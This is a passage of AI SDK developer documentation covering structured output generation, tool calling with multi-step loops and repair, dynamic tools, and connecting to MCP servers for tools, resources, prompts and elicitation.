    console.log('ID:', source.id);
    console.log('Title:', source.title);
    console.log('URL:', source.url);
    console.log('Provider metadata:', source.providerMetadata);
    console.log();
  }
}

When you use streamText, you can access the sources using the fullStream property:

const result = streamText({
  model: 'google/gemini-2.5-flash',
  tools: {
    google_search: google.tools.googleSearch({}),
  },
  prompt: 'List the top 5 San Francisco news from the past week.',
});

for await (const part of result.fullStream) {
  if (part.type === 'source' && part.sourceType === 'url') {
    console.log('ID:', part.id);
    console.log('Title:', part.title);
    console.log('URL:', part.url);
    console.log('Provider metadata:', part.providerMetadata);
    console.log();
  }
}

The sources are also available in the result.sources promise.

Examples

You can see generateText and streamText in action using various frameworks in the following examples:

`generateText`

`streamText`

title: Generating Structured Data description: Learn how to generate structured data with the AI SDK.

Generating Structured Data

The AI SDK standardises structured object generation across model providers with the generateObject and streamObject functions. You can use both functions with different output strategies, e.g. array, object, enum, or no-schema, and with different generation modes, e.g. auto, tool, or json. You can use Zod schemas, Valibot, or JSON schemas to specify the shape of the data that you want, and the AI model will generate data that conforms to that structure.

Generate Object

The generateObject generates structured data from a prompt. The schema is also used to validate the generated data, ensuring type safety and correctness.

import { generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { object } = await generateObject({
  model: __MODEL__,
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

Accessing response headers & body

Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.

You can access the raw response headers and body using the response property:

import { generateObject } from 'ai';

const result = await generateObject({
  // ...
});

console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));

Stream Object

import { streamObject } from 'ai';

const { partialObjectStream } = streamObject({
  // ...
});

// use partialObjectStream as an async iterable
for await (const partialObject of partialObjectStream) {
  console.log(partialObject);
}

You can use streamObject to stream generated UIs in combination with React Server Components (see Generative UI)) or the useObject hook.

See streamObject in action with these examples

`onError` callback

streamObject immediately starts streaming. Errors become part of the stream and are not thrown to prevent e.g. servers from crashing.

To log errors, you can provide an onError callback that is triggered when an error occurs.

import { streamObject } from 'ai';

const result = streamObject({
  // ...
  onError({ error }) {
    console.error(error); // your error logging logic here
  },
});

Output Strategy

You can use both functions with different output strategies, e.g. array, object, enum, or no-schema.

Object

The default output strategy is object, which returns the generated data as an object. You don't need to specify the output strategy if you want to use the default.

Array

import { streamObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { elementStream } = streamObject({
  model: __MODEL__,
  output: 'array',
  schema: z.object({
    name: z.string(),
    class: z
      .string()
      .describe('Character class, e.g. warrior, mage, or thief.'),
    description: z.string(),
  }),
  prompt: 'Generate 3 hero descriptions for a fantasy role playing game.',
});

for await (const hero of elementStream) {
  console.log(hero);
}

Enum

If you want to generate a specific enum value, e.g. for classification tasks, you can set the output strategy to enum and provide a list of possible values in the enum parameter.

Enum output is only available with generateObject.

import { generateObject } from 'ai';
__PROVIDER_IMPORT__;

const { object } = await generateObject({
  model: __MODEL__,
  output: 'enum',
  enum: ['action', 'comedy', 'drama', 'horror', 'sci-fi'],
  prompt:
    'Classify the genre of this movie plot: ' +
    '"A group of astronauts travel through a wormhole in search of a ' +
    'new habitable planet for humanity."',
});

No Schema

import { generateObject } from 'ai';
__PROVIDER_IMPORT__;

const { object } = await generateObject({
  model: __MODEL__,
  output: 'no-schema',
  prompt: 'Generate a lasagna recipe.',
});

Schema Name and Description

You can optionally specify a name and description for the schema. These are used by some providers for additional LLM guidance, e.g. via tool or schema name.

import { generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { object } = await generateObject({
  model: __MODEL__,
  schemaName: 'Recipe',
  schemaDescription: 'A recipe for a dish.',
  schema: z.object({
    name: z.string(),
    ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
    steps: z.array(z.string()),
  }),
  prompt: 'Generate a lasagna recipe.',
});

Accessing Reasoning

You can access the reasoning used by the language model to generate the object via the reasoning property on the result. This property contains a string with the model's thought process, if available.

import { OpenAIResponsesProviderOptions } from '@ai-sdk/openai';
import { generateObject } from 'ai';
import { z } from 'zod';

const result = await generateObject({
  model: 'openai/gpt-5',
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(
        z.object({
          name: z.string(),
          amount: z.string(),
        }),
      ),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
  providerOptions: {
    openai: {
      strictJsonSchema: true,
      reasoningSummary: 'detailed',
    } satisfies OpenAIResponsesProviderOptions,
  },
});

console.log(result.reasoning);

Error Handling

When generateObject cannot generate a valid object, it throws a AI_NoObjectGeneratedError.

This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:

The model failed to generate a response.
The model generated a response that could not be parsed.
The model generated a response that could not be validated against the schema.

The error preserves the following information to help you log the issue:

text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode.
response: Metadata about the language model response, including response id, timestamp, and model.
usage: Request token usage.
cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling.

import { generateObject, NoObjectGeneratedError } from 'ai';

try {
  await generateObject({ model, schema, prompt });
} catch (error) {
  if (NoObjectGeneratedError.isInstance(error)) {
    console.log('NoObjectGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Text:', error.text);
    console.log('Response:', error.response);
    console.log('Usage:', error.usage);
  }
}

Repairing Invalid or Malformed JSON

Sometimes the model will generate invalid or malformed JSON. You can use the repairText function to attempt to repair the JSON.

It receives the error, either a JSONParseError or a TypeValidationError, and the text that was generated by the model. You can then attempt to repair the text and return the repaired text.

import { generateObject } from 'ai';

const { object } = await generateObject({
  model,
  schema,
  prompt,
  experimental_repairText: async ({ text, error }) => {
    // example: add a closing brace to the text
    return text + '}';
  },
});

Structured outputs with `generateText` and `streamText`

You can generate structured data with generateText and streamText by using the experimental_output setting.

`generateText`

// experimental_output is a structured object that matches the schema:
const { experimental_output } = await generateText({
  // ...
  experimental_output: Output.object({
    schema: z.object({
      name: z.string(),
      age: z.number().nullable().describe('Age of the person.'),
      contact: z.object({
        type: z.literal('email'),
        value: z.string(),
      }),
      occupation: z.object({
        type: z.literal('employed'),
        company: z.string(),
        position: z.string(),
      }),
    }),
  }),
  prompt: 'Generate an example person for testing.',
});

`streamText`

// experimental_partialOutputStream contains generated partial objects:
const { experimental_partialOutputStream } = await streamText({
  // ...
  experimental_output: Output.object({
    schema: z.object({
      name: z.string(),
      age: z.number().nullable().describe('Age of the person.'),
      contact: z.object({
        type: z.literal('email'),
        value: z.string(),
      }),
      occupation: z.object({
        type: z.literal('employed'),
        company: z.string(),
        position: z.string(),
      }),
    }),
  }),
  prompt: 'Generate an example person for testing.',
});

More Examples

You can see generateObject and streamObject in action using various frameworks in the following examples:

`generateObject`

`streamObject`

title: Tool Calling description: Learn about tool calling and multi-step calls (using stopWhen) with AI SDK Core.

Tool Calling

As covered under Foundations, tools are objects that can be called by the model to perform a specific task. AI SDK Core tools contain three elements:

description: An optional description of the tool that can influence when the tool is picked.
inputSchema: A Zod schema or a JSON schema that defines the input parameters. The schema is consumed by the LLM, and also used to validate the LLM tool calls.
execute: An optional async function that is called with the inputs from the tool call. It produces a value of type RESULT (generic type). It is optional because you might want to forward tool calls to the client or to a queue instead of executing them in the same process.

The tools parameter of generateText and streamText is an object that has the tool names as keys and the tools as values:

import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  prompt: 'What is the weather in San Francisco?',
});

Tool calling is not restricted to only text generation. You can also use it to render user interfaces (Generative UI).

Multi-Step Calls (using stopWhen)

With the stopWhen setting, you can enable multi-step calls in generateText and streamText. When stopWhen is set and the model generates a tool call, the AI SDK will trigger a new generation passing in the tool result until there are no further tool calls or the stopping condition is met.

By default, when you use generateText or streamText, it triggers a single generation. This works well for many use cases where you can rely on the model's training data to generate a response. However, when you provide tools, the model now has the choice to either generate a normal text response, or generate a tool call. If the model generates a tool call, it's generation is complete and that step is finished.

Example

In the following example, there are two steps:

Step 1
1. The prompt 'What is the weather in San Francisco?' is sent to the model.
2. The model generates a tool call.
3. The tool call is executed.
Step 2
1. The tool result is sent to the model.
2. The model generates a response considering the tool result.

import { z } from 'zod';
import { generateText, tool, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;

const { text, steps } = await generateText({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  stopWhen: stepCountIs(5), // stop after a maximum of 5 steps if tools were called
  prompt: 'What is the weather in San Francisco?',
});

You can use streamText in a similar way.

Steps

Example: Extract tool results from all steps

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { steps } = await generateText({
  model: __MODEL__,
  stopWhen: stepCountIs(10),
  // ...
});

// extract all tool calls from the steps:
const allToolCalls = steps.flatMap(step => step.toolCalls);

`onStepFinish` callback

import { generateText } from 'ai';

const result = await generateText({
  // ...
  onStepFinish({ text, toolCalls, toolResults, finishReason, usage }) {
    // your own logic, e.g. for saving the chat history or recording usage
  },
});

`prepareStep` callback

The prepareStep callback is called before a step is started.

It is called with the following parameters:

model: The model that was passed into generateText.
stopWhen: The stopping condition that was passed into generateText.
stepNumber: The number of the step that is being executed.
steps: The steps that have been executed so far.
messages: The messages that will be sent to the model for the current step.

You can use it to provide different settings for a step, including modifying the input messages.

import { generateText } from 'ai';

const result = await generateText({
  // ...
  prepareStep: async ({ model, stepNumber, steps, messages }) => {
    if (stepNumber === 0) {
      return {
        // use a different model for this step:
        model: modelForThisParticularStep,
        // force a tool choice for this step:
        toolChoice: { type: 'tool', toolName: 'tool1' },
        // limit the tools that are available for this step:
        activeTools: ['tool1'],
      };
    }

    // when nothing is returned, the default settings are used
  },
});

Message Modification for Longer Agentic Loops

In longer agentic loops, you can use the messages parameter to modify the input messages for each step. This is particularly useful for prompt compression:

prepareStep: async ({ stepNumber, steps, messages }) => {
  // Compress conversation history for longer loops
  if (messages.length > 20) {
    return {
      messages: messages.slice(-10),
    };
  }

  return {};
},

Response Messages

Adding the generated assistant and tool messages to your conversation history is a common task, especially if you are using multi-step tool calls.

The response.messages property contains an array of ModelMessage objects that you can add to your conversation history:

import { generateText, ModelMessage } from 'ai';

const messages: ModelMessage[] = [
  // ...
];

const { response } = await generateText({
  // ...
  messages,
});

// add the response messages to your conversation history:
messages.push(...response.messages); // streamText: ...((await response).messages)

Dynamic Tools

AI SDK Core supports dynamic tools for scenarios where tool schemas are not known at compile time. This is useful for:

MCP (Model Context Protocol) tools without schemas
User-defined functions at runtime
Tools loaded from external sources

Using dynamicTool

The dynamicTool helper creates tools with unknown input/output types:

import { dynamicTool } from 'ai';
import { z } from 'zod';

const customTool = dynamicTool({
  description: 'Execute a custom function',
  inputSchema: z.object({}),
  execute: async input => {
    // input is typed as 'unknown'
    // You need to validate/cast it at runtime
    const { action, parameters } = input as any;

    // Execute your dynamic logic
    return { result: `Executed ${action}` };
  },
});

Type-Safe Handling

When using both static and dynamic tools, use the dynamic flag for type narrowing:

const result = await generateText({
  model: __MODEL__,
  tools: {
    // Static tool with known types
    weather: weatherTool,
    // Dynamic tool
    custom: dynamicTool({
      /* ... */
    }),
  },
  onStepFinish: ({ toolCalls, toolResults }) => {
    // Type-safe iteration
    for (const toolCall of toolCalls) {
      if (toolCall.dynamic) {
        // Dynamic tool: input is 'unknown'
        console.log('Dynamic:', toolCall.toolName, toolCall.input);
        continue;
      }

      // Static tool: full type inference
      switch (toolCall.toolName) {
        case 'weather':
          console.log(toolCall.input.location); // typed as string
          break;
      }
    }
  },
});

Preliminary Tool Results

You can return an AsyncIterable over multiple results. In this case, the last value from the iterable is the final tool result.

This can be used in combination with generator functions to e.g. stream status information during the tool execution:

tool({
  description: 'Get the current weather.',
  inputSchema: z.object({
    location: z.string(),
  }),
  async *execute({ location }) {
    yield {
      status: 'loading' as const,
      text: `Getting weather for ${location}`,
      weather: undefined,
    };

    await new Promise(resolve => setTimeout(resolve, 3000));

    const temperature = 72 + Math.floor(Math.random() * 21) - 10;

    yield {
      status: 'success' as const,
      text: `The weather in ${location} is ${temperature}°F`,
      temperature,
    };
  },
});

Tool Choice

You can use the toolChoice setting to influence when a tool is selected. It supports the following settings:

auto (default): the model can choose whether and which tools to call.
required: the model must call a tool. It can choose which tool to call.
none: the model must not call tools
{ type: 'tool', toolName: string (typed) }: the model must call the specified tool

import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  toolChoice: 'required', // force the model to call a tool
  prompt: 'What is the weather in San Francisco?',
});

Tool Execution Options

When tools are called, they receive additional options as a second parameter.

Tool Call ID

The ID of the tool call is forwarded to the tool execution. You can use it e.g. when sending tool-call related information with stream data.

import {
  streamText,
  tool,
  createUIMessageStream,
  createUIMessageStreamResponse,
} from 'ai';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const stream = createUIMessageStream({
    execute: ({ writer }) => {
      const result = streamText({
        // ...
        messages,
        tools: {
          myTool: tool({
            // ...
            execute: async (args, { toolCallId }) => {
              // return e.g. custom status for tool call
              writer.write({
                type: 'data-tool-status',
                id: toolCallId,
                data: {
                  name: 'myTool',
                  status: 'in-progress',
                },
              });
              // ...
            },
          }),
        },
      });

      writer.merge(result.toUIMessageStream());
    },
  });

  return createUIMessageStreamResponse({ stream });
}

Messages

import { generateText, tool } from 'ai';

const result = await generateText({
  // ...
  tools: {
    myTool: tool({
      // ...
      execute: async (args, { messages }) => {
        // use the message history in e.g. calls to other language models
        return { ... };
      },
    }),
  },
});

Abort Signals

import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  abortSignal: myAbortSignal, // signal that will be forwarded to tools
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({ location: z.string() }),
      execute: async ({ location }, { abortSignal }) => {
        return fetch(
          `https://api.weatherapi.com/v1/current.json?q=${location}`,
          { signal: abortSignal }, // forward the abort signal to fetch
        );
      },
    }),
  },
  prompt: 'What is the weather in San Francisco?',
});

Context (experimental)

You can pass in arbitrary context from generateText or streamText via the experimental_context setting. This context is available in the experimental_context tool execution option.

const result = await generateText({
  // ...
  tools: {
    someTool: tool({
      // ...
      execute: async (input, { experimental_context: context }) => {
        const typedContext = context as { example: string }; // or use type validation library
        // ...
      },
    }),
  },
  experimental_context: { example: '123' },
});

Tool Input Lifecycle Hooks

The following tool input lifecycle hooks are available:

onInputStart: Called when the model starts generating the input (arguments) for the tool call
onInputDelta: Called for each chunk of text as the input is streamed
onInputAvailable: Called when the complete input is available and validated

onInputStart and onInputDelta are only called in streaming contexts (when using streamText). They are not called when using generateText.

Example

import { streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const result = streamText({
  model: __MODEL__,
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
      onInputStart: () => {
        console.log('Tool call starting');
      },
      onInputDelta: ({ inputTextDelta }) => {
        console.log('Received input chunk:', inputTextDelta);
      },
      onInputAvailable: ({ input }) => {
        console.log('Complete input:', input);
      },
    }),
  },
  prompt: 'What is the weather in San Francisco?',
});

Types

Modularizing your code often requires defining types to ensure type safety and reusability. To enable this, the AI SDK provides several helper types for tools, tool calls, and tool results.

You can use them to strongly type your variables, function parameters, and return types in parts of the code that are not directly related to streamText or generateText.

The tools in streamText and generateText are defined as a ToolSet. The type inference helpers TypedToolCall<TOOLS extends ToolSet> and TypedToolResult<TOOLS extends ToolSet> can be used to extract the tool call and tool result types from the tools.

import { TypedToolCall, TypedToolResult, generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const myToolSet = {
  firstTool: tool({
    description: 'Greets the user',
    inputSchema: z.object({ name: z.string() }),
    execute: async ({ name }) => `Hello, ${name}!`,
  }),
  secondTool: tool({
    description: 'Tells the user their age',
    inputSchema: z.object({ age: z.number() }),
    execute: async ({ age }) => `You are ${age} years old!`,
  }),
};

type MyToolCall = TypedToolCall<typeof myToolSet>;
type MyToolResult = TypedToolResult<typeof myToolSet>;

async function generateSomething(prompt: string): Promise<{
  text: string;
  toolCalls: Array<MyToolCall>; // typed tool calls
  toolResults: Array<MyToolResult>; // typed tool results
}> {
  return generateText({
    model: __MODEL__,
    tools: myToolSet,
    prompt,
  });
}

Handling Errors

The AI SDK has three tool-call related errors:

NoSuchToolError: the model tries to call a tool that is not defined in the tools object
InvalidToolInputError: the model calls a tool with inputs that do not match the tool's input schema
ToolCallRepairError: an error that occurred during tool call repair

When tool execution fails (errors thrown by your tool's execute function), the AI SDK adds them as tool-error content parts to enable automated LLM roundtrips in multi-step scenarios.

`generateText`

generateText throws errors for tool schema validation issues and other errors, and can be handled using a try/catch block. Tool execution errors appear as tool-error parts in the result steps:

try {
  const result = await generateText({
    //...
  });
} catch (error) {
  if (NoSuchToolError.isInstance(error)) {
    // handle the no such tool error
  } else if (InvalidToolInputError.isInstance(error)) {
    // handle the invalid tool inputs error
  } else {
    // handle other errors
  }
}

Tool execution errors are available in the result steps:

const { steps } = await generateText({
  // ...
});

// check for tool errors in the steps
const toolErrors = steps.flatMap(step =>
  step.content.filter(part => part.type === 'tool-error'),
);

toolErrors.forEach(toolError => {
  console.log('Tool error:', toolError.error);
  console.log('Tool name:', toolError.toolName);
  console.log('Tool input:', toolError.input);
});

`streamText`

streamText sends errors as part of the full stream. Tool execution errors appear as tool-error parts, while other errors appear as error parts.

When using toUIMessageStreamResponse, you can pass an onError function to extract the error message from the error part and forward it as part of the stream response:

const result = streamText({
  // ...
});

return result.toUIMessageStreamResponse({
  onError: error => {
    if (NoSuchToolError.isInstance(error)) {
      return 'The model tried to call a unknown tool.';
    } else if (InvalidToolInputError.isInstance(error)) {
      return 'The model called a tool with invalid inputs.';
    } else {
      return 'An unknown error occurred.';
    }
  },
});

Tool Call Repair

Language models sometimes fail to generate valid tool calls, especially when the input schema is complex or the model is smaller.

If you use multiple steps, those failed tool calls will be sent back to the LLM in the next step to give it an opportunity to fix it. However, you may want to control how invalid tool calls are repaired without requiring additional steps that pollute the message history.

You can use the experimental_repairToolCall function to attempt to repair the tool call with a custom function.

You can use different strategies to repair the tool call:

Use a model with structured outputs to generate the inputs.
Send the messages, system prompt, and tool schema to a stronger model to generate the inputs.
Provide more specific repair instructions based on which tool was called.

Example: Use a model with structured outputs for repair

import { generateObject, generateText, NoSuchToolError, tool } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  tools,
  prompt,

  experimental_repairToolCall: async ({
    toolCall,
    tools,
    inputSchema,
    error,
  }) => {
    if (NoSuchToolError.isInstance(error)) {
      return null; // do not attempt to fix invalid tool names
    }

    const tool = tools[toolCall.toolName as keyof typeof tools];

    const { object: repairedArgs } = await generateObject({
      model: __MODEL__,
      schema: tool.inputSchema,
      prompt: [
        `The model tried to call the tool "${toolCall.toolName}"` +
          ` with the following inputs:`,
        JSON.stringify(toolCall.input),
        `The tool accepts the following schema:`,
        JSON.stringify(inputSchema(toolCall)),
        'Please fix the inputs.',
      ].join('\n'),
    });

    return { ...toolCall, input: JSON.stringify(repairedArgs) };
  },
});

Example: Use the re-ask strategy for repair

import { generateObject, generateText, NoSuchToolError, tool } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  tools,
  prompt,

  experimental_repairToolCall: async ({
    toolCall,
    tools,
    error,
    messages,
    system,
  }) => {
    const result = await generateText({
      model,
      system,
      messages: [
        ...messages,
        {
          role: 'assistant',
          content: [
            {
              type: 'tool-call',
              toolCallId: toolCall.toolCallId,
              toolName: toolCall.toolName,
              input: toolCall.input,
            },
          ],
        },
        {
          role: 'tool' as const,
          content: [
            {
              type: 'tool-result',
              toolCallId: toolCall.toolCallId,
              toolName: toolCall.toolName,
              output: error.message,
            },
          ],
        },
      ],
      tools,
    });

    const newToolCall = result.toolCalls.find(
      newToolCall => newToolCall.toolName === toolCall.toolName,
    );

    return newToolCall != null
      ? {
          toolCallType: 'function' as const,
          toolCallId: toolCall.toolCallId,
          toolName: toolCall.toolName,
          input: JSON.stringify(newToolCall.input),
        }
      : null;
  },
});

Active Tools

It is an array of tool names that are currently active. By default, the value is undefined and all tools are active.

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { text } = await generateText({
  model: __MODEL__,
  tools: myToolSet,
  activeTools: ['firstTool'],
});

Multi-modal Tool Results

For Google, use base64 media parts (image-data / file-data) or base64 data: URLs in URL-style parts. Remote HTTP(S) URLs in tool-result URL parts are not supported.

In order to send multi-modal tool results, e.g. screenshots, back to the model, they need to be converted into a specific format.

AI SDK Core tools have an optional toModelOutput function that converts the tool result into a content part.

Here is an example for converting a screenshot into a content part:

const result = await generateText({
  model: __MODEL__,
  tools: {
    computer: anthropic.tools.computer_20241022({
      // ...
      async execute({ action, coordinate, text }) {
        switch (action) {
          case 'screenshot': {
            return {
              type: 'image',
              data: fs
                .readFileSync('./data/screenshot-editor.png')
                .toString('base64'),
            };
          }
          default: {
            return `executed ${action}`;
          }
        }
      },

      // map to tool result content for LLM consumption:
      toModelOutput(result) {
        return {
          type: 'content',
          value:
            typeof result === 'string'
              ? [{ type: 'text', text: result }]
              : [{ type: 'media', data: result.data, mediaType: 'image/png' }],
        };
      },
    }),
  },
  // ...
});

Extracting Tools

Once you start having many tools, you might want to extract them into separate files. The tool helper function is crucial for this, because it ensures correct type inference.

Here is an example of an extracted tool:

import { tool } from 'ai';
import { z } from 'zod';

// the `tool` helper function ensures correct type inference:
export const weatherTool = tool({
  description: 'Get the weather in a location',
  inputSchema: z.object({
    location: z.string().describe('The location to get the weather for'),
  }),
  execute: async ({ location }) => ({
    location,
    temperature: 72 + Math.floor(Math.random() * 21) - 10,
  }),
});

MCP Tools

The AI SDK supports connecting to Model Context Protocol (MCP) servers to access their tools. MCP enables your AI applications to discover and use tools across various services through a standardized interface.

For detailed information about MCP tools, including initialization, transport options, and usage patterns, see the MCP Tools documentation.

AI SDK Tools vs MCP Tools

In most cases, you should define your own AI SDK tools for production applications. They provide full control, type safety, and optimal performance. MCP tools are best suited for rapid development iteration and scenarios where users bring their own tools.

Aspect	AI SDK Tools	MCP Tools
Type Safety	Full static typing end-to-end	Dynamic discovery at runtime
Execution	Same process as your request (low latency)	Separate server (network overhead)
Prompt Control	Full control over descriptions and schemas	Controlled by MCP server owner
Schema Control	You define and optimize for your model	Controlled by MCP server owner
Version Management	Full visibility over updates	Can update independently (version skew risk)
Authentication	Same process, no additional auth required	Separate server introduces additional auth complexity
Best For	Production applications requiring control and performance	Development iteration, user-provided tools

Examples

You can see tools in action using various frameworks in the following examples:

title: Model Context Protocol (MCP) description: Learn how to connect to Model Context Protocol (MCP) servers and use their tools with AI SDK Core.

Model Context Protocol (MCP)

The AI SDK supports connecting to Model Context Protocol (MCP) servers to access their tools, resources, and prompts. This enables your AI applications to discover and use capabilities across various services through a standardized interface.

Initializing an MCP Client

We recommend using HTTP transport (like StreamableHTTPClientTransport) for production deployments. The stdio transport should only be used for connecting to local servers as it cannot be deployed to production environments.

Create an MCP client using one of the following transport options:

HTTP transport (Recommended): Either configure HTTP directly via the client using transport: { type: 'http', ... }, or use MCP's official TypeScript SDK StreamableHTTPClientTransport
SSE (Server-Sent Events): An alternative HTTP-based transport
stdio: For local development only. Uses standard input/output streams for local MCP servers

HTTP Transport (Recommended)

For production deployments, we recommend using the HTTP transport. You can configure it directly on the client:

import { experimental_createMCPClient as createMCPClient } from '@ai-sdk/mcp';

const mcpClient = await createMCPClient({
  transport: {
    type: 'http',
    url: 'https://your-server.com/mcp',

    // optional: configure HTTP headers
    headers: { Authorization: 'Bearer my-api-key' },

    // optional: provide an OAuth client provider for automatic authorization
    authProvider: myOAuthClientProvider,
  },
});

Alternatively, you can use StreamableHTTPClientTransport from MCP's official TypeScript SDK:

import { experimental_createMCPClient as createMCPClient } from '@ai-sdk/mcp';
import { StreamableHTTPClientTransport } from '@modelcontextprotocol/sdk/client/streamableHttp.js';

const url = new URL('https://your-server.com/mcp');
const mcpClient = await createMCPClient({
  transport: new StreamableHTTPClientTransport(url, {
    sessionId: 'session_123',
  }),
});

SSE Transport

SSE provides an alternative HTTP-based transport option. Configure it with a type and url property. You can also provide an authProvider for OAuth:

import { experimental_createMCPClient as createMCPClient } from '@ai-sdk/mcp';

const mcpClient = await createMCPClient({
  transport: {
    type: 'sse',
    url: 'https://my-server.com/sse',

    // optional: configure HTTP headers
    headers: { Authorization: 'Bearer my-api-key' },

    // optional: provide an OAuth client provider for automatic authorization
    authProvider: myOAuthClientProvider,
  },
});

Stdio Transport (Local Servers)

The Stdio transport can be imported from either the MCP SDK or the AI SDK:

import { experimental_createMCPClient as createMCPClient } from '@ai-sdk/mcp';
import { StdioClientTransport } from '@modelcontextprotocol/sdk/client/stdio.js';
// Or use the AI SDK's stdio transport:
// import { Experimental_StdioMCPTransport as StdioClientTransport } from '@ai-sdk/mcp/mcp-stdio';

const mcpClient = await createMCPClient({
  transport: new StdioClientTransport({
    command: 'node',
    args: ['src/stdio/dist/server.js'],
  }),
});

Custom Transport

You can also bring your own transport by implementing the MCPTransport interface for specific requirements not covered by the standard transports.

Authorization via OAuth is supported when using the AI SDK MCP HTTP or SSE transports by providing an authProvider.

Closing the MCP Client

After initialization, you should close the MCP client based on your usage pattern:

For short-lived usage (e.g., single requests), close the client when the response is finished
For long-running clients (e.g., command line apps), keep the client open but ensure it's closed when the application terminates

When streaming responses, you can close the client when the LLM response has finished. For example, when using streamText, you should use the onFinish callback:

const mcpClient = await experimental_createMCPClient({
  // ...
});

const tools = await mcpClient.tools();

const result = await streamText({
  model: __MODEL__,
  tools,
  prompt: 'What is the weather in Brooklyn, New York?',
  onFinish: async () => {
    await mcpClient.close();
  },
});

When generating responses without streaming, you can use try/finally or cleanup functions in your framework:

let mcpClient: MCPClient | undefined;

try {
  mcpClient = await experimental_createMCPClient({
    // ...
  });
} finally {
  await mcpClient?.close();
}

Using MCP Tools

The client's tools method acts as an adapter between MCP tools and AI SDK tools. It supports two approaches for working with tool schemas:

Schema Discovery

With schema discovery, all tools offered by the server are automatically listed, and input parameter types are inferred based on the schemas provided by the server:

const tools = await mcpClient.tools();

This approach is simpler to implement and automatically stays in sync with server changes. However, you won't have TypeScript type safety during development, and all tools from the server will be loaded

Schema Definition

For better type safety and control, you can define the tools and their input schemas explicitly in your client code:

import { z } from 'zod';

const tools = await mcpClient.tools({
  schemas: {
    'get-data': {
      inputSchema: z.object({
        query: z.string().describe('The data query'),
        format: z.enum(['json', 'text']).optional(),
      }),
    },
    // For tools with zero inputs, you should use an empty object:
    'tool-with-no-args': {
      inputSchema: z.object({}),
    },
  },
});

This approach provides full TypeScript type safety and IDE autocompletion, letting you catch parameter mismatches during development. When you define schemas, the client only pulls the explicitly defined tools, keeping your application focused on the tools it needs

Using MCP Resources

According to the MCP specification, resources are application-driven data sources that provide context to the model. Unlike tools (which are model-controlled), your application decides when to fetch and pass resources as context.

The MCP client provides three methods for working with resources:

Listing Resources

List all available resources from the MCP server:

const resources = await mcpClient.listResources();

Reading Resource Contents

Read the contents of a specific resource by its URI:

const resourceData = await mcpClient.readResource({
  uri: 'file:///example/document.txt',
});

Listing Resource Templates

Resource templates are dynamic URI patterns that allow flexible queries. List all available templates:

const templates = await mcpClient.listResourceTemplates();

Using MCP Prompts

According to the MCP specification, prompts are user-controlled templates that servers expose for clients to list and retrieve with optional arguments.

Listing Prompts

const prompts = await mcpClient.listPrompts();

Getting a Prompt

Retrieve prompt messages, optionally passing arguments defined by the server:

const prompt = await mcpClient.getPrompt({
  name: 'code_review',
  arguments: { code: 'function add(a, b) { return a + b; }' },
});

Handling Elicitation Requests

Elicitation is a mechanism where MCP servers can request additional information from the client during tool execution. For example, a server might need user input to complete a registration form or confirmation for a sensitive operation.

Enabling Elicitation Support

To enable elicitation, you need to advertise the capability when creating the MCP client:

const mcpClient = await experimental_createMCPClient({
  transport: {
    type: 'sse',
    url: 'https://your-server.com/sse',
  },
  capabilities: {
    elicitation: {},
  },
});

Registering an Elicitation Handler

Use the onElicitationRequest method to register a handler that will be called when the server requests input:

import { ElicitationRequestSchema } from '@ai-sdk/mcp';

mcpClient.onElicitationRequest(ElicitationRequestSchema, async request => {
  // request.params.message: A message describing what input is needed
  // request.params.requestedSchema: JSON schema defining the expected input structure

  // Get input from the user (implement according to your application's needs)
  const userInput = await getInputFromUser(
    request.params.message,
    request.params.requestedSchema,
  );

  // Return the result with one of three actions:
  return {
    action: 'accept', // or 'decline' or 'cancel'
    content: userInput, // only required when action is 'accept'
  };
});

Elicitation Response Actions

Your handler must return an object with an action field that can be one of:

'accept': User provided the requested information. Must include content with the data.
